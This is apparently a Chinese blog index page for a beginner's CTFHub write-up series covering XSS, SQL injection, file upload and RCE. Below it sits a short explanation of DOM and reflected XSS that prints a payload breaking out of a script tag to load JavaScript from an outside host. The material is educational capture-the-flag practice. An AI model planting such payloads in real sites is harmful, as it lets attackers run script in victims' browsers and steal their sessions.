CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(首页)

CTFHub题目WriteUP地址

本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅

1.web前置技能(已完结)
2.信息泄露(已完结)
3.密码口令+XSS(已完结)
4.SQL注入(已完结)
5.文件上传(已完结)
6.RCE(已完结)

前言

这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF
,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻
防世界的意思,每个人有每个人的想法),后来也因为学业较忙且基础太差无法开展此方面的学习,直到到了暑假,我
自学完了一些编程语言包括Python、Java等,网页的前后端知识也有所了解后,我继续在学长推荐的CTFHub上了我的
CTF之旅。

本人还是属于CTF小白,此文章也引用了一些大佬的资料,希望大家能够共同进步,废话不多说开始看 Write Up 吧!

注:CTFHub采用的是动态flag,我这道题的flag对了不代表你再复制进去也对哦!所以请不要偷懒,认真滴自己解决吧!

接下去可以根据地址去康康我写的WP吧!

### CTFHub 技能树介绍 CTFHub 是一个专注于网络安全竞赛(Capture The Flag, CTF)的学习平台,旨在帮助参与者提升在各种安全领域的能力。技能树是该平台上用于指导学习者逐步掌握不同类型的漏洞利用和技术的重要组成部分。 #### XSS 攻击中的 DOM 跳转技术 在处理特定的跨站脚本攻击(XSS)场景时,DOM跳转会涉及到URL解析和重定向逻辑。例如,在给定的例子中,通过访问带有特殊查询字符串的链接`http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=http://example.com/`[^1],JavaScript代码会读取并解析这个 URL 参数来执行相应的操作。具体来说,`.split("=")`方法被用来分割参数名称与对应的值。 #### 利用 DOM 反射型 XSS 进行攻击 另一个重要的概念是在 Web 应用程序中存在的反射型 XSS漏洞。这种类型的攻击通常发生在服务器端未正确过滤用户输入的情况下。当恶意脚本作为响应的一部分返回给浏览器时就会触发此类攻击。比如下面这段 HTML 注入的内容可以绕过某些简单的防护机制: ```html ';</script><script src=//xs.pe/6b6></script> ``` 此片段会在页面加载过程中被执行,并尝试从外部资源加载额外的 JavaScript 文件[^2]。 为了有效应对这些威胁,开发者应该始终遵循最佳实践原则,如对所有不可信的数据进行严格的验证和编码处理;同时也要不断更新自己的知识体系以跟上最新的攻防趋势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值